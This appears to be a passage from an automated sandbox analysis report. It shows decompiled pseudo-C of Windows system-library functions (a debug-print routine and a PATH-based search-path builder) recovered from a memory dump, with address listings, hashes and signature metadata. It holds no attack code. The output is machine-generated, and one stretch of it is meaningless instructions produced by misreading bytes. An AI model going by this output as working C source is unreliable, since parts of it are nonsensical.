				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x34ff7a8);
				E0347D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0347D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0346D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0346F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0347DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0346B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0346B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0346E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0346A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x0342b171
0x0342b171
0x0342b171
0x0342b171
0x0342b171
0x0342b176
0x0342b17b
0x0342b180
0x0342b186
0x0342b18f
0x0342b198
0x0342b1a4
0x0342b1aa
0x03484802
0x03484802
0x03484805
0x0348480c
0x0348480e
0x0342b1d1
0x0342b1d3
0x0342b1de
0x0342b1de
0x03484817
0x0348481e
0x03484820
0x03484822
0x03484822
0x03484824
0x03484824
0x0348482a
0x00000000
0x00000000
0x03484835
0x0348483a
0x0348483d
0x0348483f
0x03484842
0x03484842
0x03484842
0x03484846
0x0348484c
0x0348484e
0x03484851
0x03484851
0x03484853
0x03484854
0x03484854
0x03484858
0x0348485a
0x0348485a
0x0348485d
0x0348485f
0x03484861
0x03484861
0x03484866
0x0348486b
0x0348486e
0x03484871
0x03484876
0x03484876
0x03484878
0x0348487b
0x03484884
0x03484884
0x00000000
0x0348487d
0x0348487d
0x03484882
0x03484889
0x03484889
0x0348488f
0x03484891
0x034848e0
0x034848e2
0x034848e4
0x034848e4
0x034848e7
0x034848e7
0x034848ed
0x034848f4
0x034848f6
0x03484951
0x03484951
0x03484953
0x03484953
0x03484956
0x03484956
0x03484958
0x03484959
0x03484959
0x0348495d
0x0348495d
0x0348495f
0x0348495f
0x03484965
0x03484969
0x034849ba
0x034849ba
0x034849c1
0x034849c5
0x034849cc
0x034849d4
0x034849d7
0x034849da
0x034849e4
0x034849e5
0x034849f3
0x03484a02
0x00000000
0x03484a02
0x03484972
0x03484974
0x00000000
0x00000000
0x03484976
0x03484979
0x03484982
0x03484983
0x03484984
0x0348498b
0x0348498d
0x03484991
0x03484993
0x03484999
0x0348499d
0x034849a2
0x034849a2
0x034849a2
0x03484999
0x034849ac
0x00000000
0x034849b3
0x034848f8
0x034848fe
0x00000000
0x00000000
0x00000000
0x034848fe
0x03484895
0x0348489c
0x034848ad
0x034848b2
0x034848b5
0x034848b7
0x034848ba
0x034848bc
0x034848c6
0x034848c6
0x034848cb
0x034848d1
0x034848d4
0x034848d8
0x034848d8
0x00000000
0x034848d8
0x034848be
0x034848c0
0x00000000
0x00000000
0x034848c2
0x00000000
0x00000000
0x00000000
0x034848c4
0x00000000
0x03484882
0x0348487b
0x03484904
0x03484906
0x00000000
0x00000000
0x03484908
0x0348490e
0x00000000
0x00000000
0x03484910
0x03484917
0x03484917
0x00000000
0x03484917
0x0342b1ba
0x034847f9
0x034847fc
0x00000000
0x00000000
0x00000000
0x034847fc
0x0342b1c0
0x0342b1c0
0x0342b1c3
0x0342b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 034848AD

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 8b7fb3641bf5a8819e3cd6bd250939e338f0cf39e21aa0a61e730490f99b368c
Instruction ID: 2d5f01b20600f4dcc56b700741f78aaafcf213d01cbbc3f54ff965042ab66b73
Opcode Fuzzy Hash: 8b7fb3641bf5a8819e3cd6bd250939e338f0cf39e21aa0a61e730490f99b368c
Instruction Fuzzy Hash: 9051E279D0426A8EDB30EF76C844BAEBBB0AF00310F1441AFD859AF381D73049468F95

Uniqueness

Uniqueness Score: -1.00%

Function 03452581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E03452581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200897, char _a1546912577) {
				intOrPtr _v1;
				void* _v3;
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t237;
				signed int _t241;
				char* _t244;
				signed int _t247;
				signed int _t249;
				intOrPtr _t251;
				signed int _t254;
				signed int _t261;
				signed int _t264;
				signed int _t272;
				intOrPtr _t278;
				signed int _t280;
				signed int _t282;
				void* _t286;
				signed int _t287;
				unsigned int _t290;
				signed int _t294;
				signed int _t301;
				signed int _t305;
				intOrPtr _t318;
				signed int _t327;
				signed int _t329;
				signed int _t330;
				signed int _t334;
				signed int _t335;
				void* _t339;
				signed int _t340;
				signed int _t342;
				signed int _t353;
				void* _t354;
				void* _t357;

				_t342 = _t353;
				_t354 = _t353 - 0x4c;
				_v8 =  *0x351d360 ^ _t342;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t334 = 0x351b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t290 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t278 = 0x48;
				_t315 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t327 = 0;
				_v37 = _t315;
				if(_v48 <= 0) {
					L16:
					_t45 = _t278 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t335 = 0xc0000106;
						goto L32;
					} else {
						_t334 = L03444620(_t290,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t278);
						_v52 = _t334;
						__eflags = _t334;
						if(_t334 == 0) {
							_t335 = 0xc0000017;
							goto L32;
						} else {
							 *(_t334 + 0x44) =  *(_t334 + 0x44) & 0x00000000;
							_t50 = _t334 + 0x48; // 0x48
							_t329 = _t50;
							_t315 = _v32;
							 *((intOrPtr*)(_t334 + 0x3c)) = _t278;
							_t280 = 0;
							 *((short*)(_t334 + 0x30)) = _v48;
							__eflags = _t315;
							if(_t315 != 0) {
								 *(_t334 + 0x18) = _t329;
								__eflags = _t315 - 0x3518478;
								 *_t334 = ((0 | _t315 == 0x03518478) - 0x00000001 & 0xfffffffb) + 7;
								E0346F3E0(_t329,  *((intOrPtr*)(_t315 + 4)),  *_t315 & 0x0000ffff);
								_t315 = _v32;
								_t354 = _t354 + 0xc;
								_t280 = 1;
								__eflags = _a8;
								_t329 = _t329 + (( *_t315 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t272 = E034B39F2(_t329);
									_t315 = _v32;
									_t329 = _t272;
								}
							}
							_t294 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t335 = _v68;
								__eflags = 0;
								 *((short*)(_t329 - 2)) = 0;
								goto L32;
							} else {
								_t282 = _t334 + _t280 * 4;
								_v56 = _t282;
								do {
									__eflags = _t315;
									if(_t315 != 0) {
										_t237 =  *(_v60 + _t294 * 4);
										__eflags = _t237;
										if(_t237 == 0) {
											goto L30;
										} else {
											__eflags = _t237 == 5;
											if(_t237 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t282 =  *(_v60 + _t294 * 4);
										 *(_t282 + 0x18) = _t329;
										_t241 =  *(_v60 + _t294 * 4);
										__eflags = _t241 - 8;
										if(_t241 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t241 * 4 +  &M03452959))) {
												case 0:
													__ax =  *0x3518488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0346F3E0(__edi,  *0x351848c, __ax & 0x0000ffff);
														__eax =  *0x3518488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0346F3E0(_t329, _v80, _v64);
													_t267 = _v64;
													goto L26;
												case 2:
													 *0x3518480 & 0x0000ffff = E0346F3E0(__edi,  *0x3518484,  *0x3518480 & 0x0000ffff);
													__eax =  *0x3518480 & 0x0000ffff;
													__eax = ( *0x3518480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0346F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0346F3E0(_t329, _v76, _v36);
														_t267 = _v36;
													}
													L26:
													_t354 = _t354 + 0xc;
													_t329 = _t329 + (_t267 >> 1) * 2 + 2;
													__eflags = _t329;
													L27:
													_push(0x3b);
													_pop(_t269);
													 *((short*)(_t329 - 2)) = _t269;
													goto L28;
												case 6:
													__ebx =  *0x351575c;
													__eflags = __ebx - 0x351575c;
													if(__ebx != 0x351575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0346F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x351575c;
														} while (__ebx != 0x351575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x3518478 & 0x0000ffff = E0346F3E0(__edi,  *0x351847c,  *0x3518478 & 0x0000ffff);
													__eax =  *0x3518478 & 0x0000ffff;
													__eax = ( *0x3518478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E034B39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x3516e58 & 0x0000ffff = E0346F3E0(__edi,  *0x3516e5c,  *0x3516e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x3516e58 & 0x0000ffff;
													__eax = ( *0x3516e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t294 = _v16;
													_t315 = _v32;
													L29:
													_t282 = _t282 + 4;
													__eflags = _t282;
													_v56 = _t282;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t294 = _t294 + 1;
									_v16 = _t294;
									__eflags = _t294 - _v48;
								} while (_t294 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t241 =  *(_v60 + _t327 * 4);
						if(_t241 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t241 * 4 +  &M03452935))) {
							case 0:
								__ax =  *0x3518488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t315 =  &_v64;
								_v80 = E03452E3E(0,  &_v64);
								_t278 = _t278 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x3518480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x3518480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0343EEF0(0x35179a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0343EB70(__ecx, 0x35179a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t215 = _v72;
											__eflags = _t215;
											if(_t215 != 0) {
												L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
											}
											_t216 = _v52;
											__eflags = _t216;
											if(_t216 != 0) {
												__eflags = _t335;
												if(_t335 < 0) {
													L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
													_t216 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t290 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x3517b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L03444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0343EB70(__ecx, 0x35179a0);
										__eax = _v52;
										L36:
										_pop(_t328);
										_pop(_t336);
										__eflags = _v8 ^ _t342;
										_pop(_t279);
										return E0346B640(_t216, _t279, _v8 ^ _t342, _t315, _t328, _t336);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t274 = _v56;
								if(_v56 != 0) {
									_t315 =  &_v36;
									_t276 = E03452E3E(_t274,  &_v36);
									_t290 = _v36;
									_v76 = _t276;
								}
								if(_t290 == 0) {
									goto L44;
								} else {
									_t278 = _t278 + 2 + _t290;
								}
								goto L14;
							case 6:
								__eax =  *0x3515764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x3518478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x3518478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x3516e58 & 0x0000ffff;
								__eax = ( *0x3516e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t327 = _t327 + 1;
								if(_t327 >= _v48) {
									goto L16;
								} else {
									_t315 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					_t357 = _t354 +  *((intOrPtr*)(_t334 + 0x28)) + _t241;
					asm("daa");
					_t244 = _t241 +  *((intOrPtr*)(_t334 + 0x28)) +  *0x1f034526 +  *((intOrPtr*)(_t315 +  *((intOrPtr*)(_t241 +  *((intOrPtr*)(_t334 + 0x28)) +  *0x1f034526 +  &_a1530200897))));
					_v1 = _v1 - _t244;
					 *_t244 =  *_t244 - 0x45;
					asm("daa");
					_v1 = _v1 - _t244;
					_v1 = _v1 - _t244;
					asm("daa");
					_t286 = 0x25;
					_t339 = _t334 + _t334 - 1 +  *((intOrPtr*)(_t244 +  &_a1546912577));
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x34fff00);
					E0347D08C(_t286, _t329, _t339);
					_v44 =  *[fs:0x18];
					_t330 = 0;
					 *_a24 = 0;
					_t287 = _a12;
					__eflags = _t287;
					if(_t287 == 0) {
						_t247 = 0xc0000100;
					} else {
						_v8 = 0;
						_t340 = 0xc0000100;
						_v52 = 0xc0000100;
						_t249 = 4;
						while(1) {
							_v40 = _t249;
							__eflags = _t249;
							if(_t249 == 0) {
								break;
							}
							_t305 = _t249 * 0xc;
							_v48 = _t305;
							__eflags = _t287 -  *((intOrPtr*)(_t305 + 0x3401664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t264 = E0346E5C0(_a8,  *((intOrPtr*)(_t305 + 0x3401668)), _t287);
									_t357 = _t357 + 0xc;
									__eflags = _t264;
									if(__eflags == 0) {
										_t340 = E034A51BE(_t287,  *((intOrPtr*)(_v48 + 0x340166c)), _a16, _t330, _t340, __eflags, _a20, _a24);
										_v52 = _t340;
										break;
									} else {
										_t249 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t249 = _t249 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t340;
						__eflags = _t340;
						if(_t340 < 0) {
							__eflags = _t340 - 0xc0000100;
							if(_t340 == 0xc0000100) {
								_t301 = _a4;
								__eflags = _t301;
								if(_t301 != 0) {
									_v36 = _t301;
									__eflags =  *_t301 - _t330;
									if( *_t301 == _t330) {
										_t340 = 0xc0000100;
										goto L76;
									} else {
										_t318 =  *((intOrPtr*)(_v44 + 0x30));
										_t251 =  *((intOrPtr*)(_t318 + 0x10));
										__eflags =  *((intOrPtr*)(_t251 + 0x48)) - _t301;
										if( *((intOrPtr*)(_t251 + 0x48)) == _t301) {
											__eflags =  *(_t318 + 0x1c);
											if( *(_t318 + 0x1c) == 0) {
												L106:
												_t340 = E03452AE4( &_v36, _a8, _t287, _a16, _a20, _a24);
												_v32 = _t340;
												__eflags = _t340 - 0xc0000100;
												if(_t340 != 0xc0000100) {
													goto L69;
												} else {
													_t330 = 1;
													_t301 = _v36;
													goto L75;
												}
											} else {
												_t254 = E03436600( *(_t318 + 0x1c));
												__eflags = _t254;
												if(_t254 != 0) {
													goto L106;
												} else {
													_t301 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t340 = E03452C50(_t301, _a8, _t287, _a16, _a20, _a24, _t330);
											L76:
											_v32 = _t340;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0343EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t340 = _a24;
									_t261 = E03452AE4( &_v36, _a8, _t287, _a16, _a20, _t340);
									_v32 = _t261;
									__eflags = _t261 - 0xc0000100;
									if(_t261 == 0xc0000100) {
										_v32 = E03452C50(_v36, _a8, _t287, _a16, _a20, _t340, 1);
									}
									_v8 = _t330;
									E03452ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t247 = _t340;
					}
					L70:
					return E0347D0D1(_t247);
				}
				L108:
			}

0x03452584
0x03452586
0x03452590
0x03452596
0x03452597
0x03452598
0x03452599
0x0345259e
0x034525a4
0x034525a9
0x034525ac
0x034525ae
0x034525b1
0x034525b2
0x034525b5
0x034525b8
0x034525bb
0x034525bc
0x034525bf
0x034525c2
0x034525c5
0x034525c6
0x034525cb
0x034525ce
0x034525d8
0x034525dd
0x034525de
0x034525e1
0x034525e3
0x034525e9
0x034526da
0x034526da
0x034526dd
0x034526e2
0x03495b56
0x00000000
0x034526e8
0x034526f9
0x034526fb
0x034526fe
0x03452700
0x03495b60
0x00000000
0x03452706
0x03452706
0x0345270a
0x0345270a
0x0345270d
0x03452713
0x03452716
0x03452718
0x0345271c
0x0345271e
0x03495b6c
0x03495b6f
0x03495b7f
0x03495b89
0x03495b8e
0x03495b93
0x03495b96
0x03495b9c
0x03495ba0
0x03495ba3
0x03495bab
0x03495bb0
0x03495bb3
0x03495bb3
0x03495ba3
0x03452724
0x03452726
0x03452729
0x0345272c
0x0345279d
0x0345279d
0x034527a0
0x034527a2
0x00000000
0x0345272e
0x0345272e
0x03452731
0x03452734
0x03452734
0x03452736
0x03495bc1
0x03495bc1
0x03495bc4
0x00000000
0x03495bca
0x03495bca
0x03495bcd
0x00000000
0x03495bd3
0x00000000
0x03495bd3
0x03495bcd
0x0345273c
0x0345273c
0x03452742
0x03452747
0x0345274a
0x0345274d
0x03452750
0x00000000
0x03452756
0x03452756
0x00000000
0x03452902
0x03452908
0x0345290b
0x00000000
0x03452911
0x0345291c
0x03452921
0x00000000
0x03452921
0x00000000
0x00000000
0x03452880
0x03452887
0x0345288c
0x00000000
0x00000000
0x03452805
0x0345280a
0x03452814
0x03452816
0x00000000
0x00000000
0x0345281e
0x03452821
0x03452823
0x00000000
0x03452829
0x03452829
0x03452831
0x0345283c
0x0345283e
0x00000000
0x0345283e
0x00000000
0x00000000
0x0345284e
0x03452850
0x03452851
0x03452854
0x03452857
0x0345285a
0x0345285c
0x0345285d
0x00000000
0x00000000
0x0345275d
0x03452761
0x00000000
0x03452767
0x0345276e
0x03452773
0x03452773
0x03452776
0x03452778
0x0345277e
0x0345277e
0x03452781
0x03452781
0x03452783
0x03452784
0x00000000
0x00000000
0x03495bd8
0x03495bde
0x03495be4
0x03495be6
0x03495be8
0x03495be9
0x03495bee
0x03495bf8
0x03495bff
0x03495c01
0x03495c04
0x03495c07
0x03495c0b
0x03495c0d
0x03495c0d
0x03495c15
0x03495c18
0x03495c1b
0x03495c1b
0x03495c1e
0x00000000
0x00000000
0x034528c3
0x034528c8
0x034528d2
0x034528d4
0x034528d8
0x034528db
0x03495c26
0x03495c28
0x03495c2d
0x03495c2d
0x00000000
0x00000000
0x03495c34
0x03495c36
0x03495c49
0x03495c4e
0x03495c54
0x03495c5b
0x03495c5d
0x03495c60
0x03452788
0x03452788
0x0345278b
0x0345278e
0x0345278e
0x0345278e
0x03452791
0x00000000
0x00000000
0x03452756
0x03452750
0x00000000
0x03452794
0x03452794
0x03452795
0x03452798
0x03452798
0x00000000
0x03452734
0x0345272c
0x03452700
0x034525ef
0x034525ef
0x034525ef
0x034525f2
0x034525f8
0x00000000
0x00000000
0x034525fe
0x00000000
0x034528e6
0x034528ec
0x034528ef
0x034528f5
0x034528f8
0x034528f8
0x00000000
0x034528f8
0x00000000
0x00000000
0x03452866
0x03452866
0x03452876
0x03452879
0x00000000
0x00000000
0x034527e0
0x034527e7
0x034527e9
0x034527eb
0x03495afd
0x00000000
0x03495afd
0x00000000
0x00000000
0x03452633
0x03452638
0x0345263b
0x0345263c
0x0345263e
0x03452640
0x03452642
0x03452647
0x03452649
0x0345264e
0x03452650
0x03452653
0x03452659
0x034526a2
0x034526a7
0x034526ac
0x034526b2
0x03495b11
0x03495b15
0x03495b17
0x00000000
0x034526b8
0x034526b8
0x034526ba
0x034527a6
0x034527a6
0x034527a9
0x034527ab
0x034527b9
0x034527b9
0x034527be
0x034527c1
0x034527c3
0x034527c5
0x034527c7
0x03495c74
0x03495c79
0x03495c79
0x034527c7
0x00000000
0x034526c0
0x034526c0
0x034526c3
0x034526c6
0x034526c6
0x034526c9
0x034526c9
0x00000000
0x034526c9
0x034526ba
0x0345265b
0x0345265b
0x0345265e
0x03452667
0x0345266d
0x03452677
0x0345267c
0x0345267f
0x03452681
0x03495b49
0x03495b4e
0x034527cd
0x034527d0
0x034527d1
0x034527d2
0x034527d4
0x034527dd
0x03452687
0x03452687
0x0345268a
0x0345268b
0x0345268e
0x0345268f
0x03452691
0x03452696
0x03452698
0x0345269d
0x0345269f
0x00000000
0x0345269f
0x03452681
0x00000000
0x00000000
0x03452846
0x00000000
0x00000000
0x03452605
0x0345260a
0x0345260c
0x03452611
0x03452616
0x03452619
0x03452619
0x0345261e
0x00000000
